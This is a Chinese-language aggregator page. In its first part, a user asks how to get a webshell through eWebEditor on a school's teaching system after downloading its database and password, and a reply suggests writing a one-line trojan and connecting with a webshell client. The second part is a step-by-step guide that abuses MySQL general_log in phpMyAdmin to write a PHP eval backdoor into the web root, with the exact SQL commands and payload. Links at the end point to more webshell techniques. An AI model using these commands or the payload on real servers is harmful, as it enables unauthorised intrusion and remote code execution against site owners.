如何用一句话对ewebeditor拿webshell

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何用一句话对ewebeditor拿webshell相关的知识,希望对你有一定的参考价值。

对session欺骗拿shell的问题讨论的也不知道什么结果,我自己是没成功过在这里想向大家求教下如何用一句话对ewebeditor拿shell。前几天看到系里一个网络教学系统,有ewebeditor,数据库是asp格式的虽然下载下来,而且也得到了密码,后台修改上传格式asa,上传后门,但是,没执行权限。郁闷本想更改路径的,但是,发现怎么改都没用。问下各位怎么才能拿到shell?

参考技术A 预览样式,写入一句话,然后用菜刀连接
如果同样限制脚本执行,那也没办法

通过phpMyAdmin拿webshell

general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句

所以可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取webshell

进入phpMyAdmin后在SQL处执行SQL语句

首先查看general log是否开启

show variables like \'general_log\';

general log是关闭状态,执行SQL语句开启general log

set global general_log=on;

开启成功

然后把general_log_file设置为shell的绝对路径

SET global general_log_file=\'C:/phpStudy/PHPTutorial/WWW/x.php\';

创建的x.php里的内容

然后执行SQL查询语句

SELECT \'<?php @eval($_POST["x"]);?>\';

执行成功

看一下x.php里的内容

成功插入了一句话木马

用菜刀连接,看看是否能够解析的

 

连接成功

以上是关于如何用一句话对ewebeditor拿webshell的主要内容,如果未能解决你的问题,请参考以下文章

通过phpMyAdmin拿webshell

如何用PHP和html做一个附件上传的页面?

利用IISPUT漏洞上传木马,获取webshell

普通权限拿webshell

记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门)

新版mysql写入webshell(测试版本5.5.53)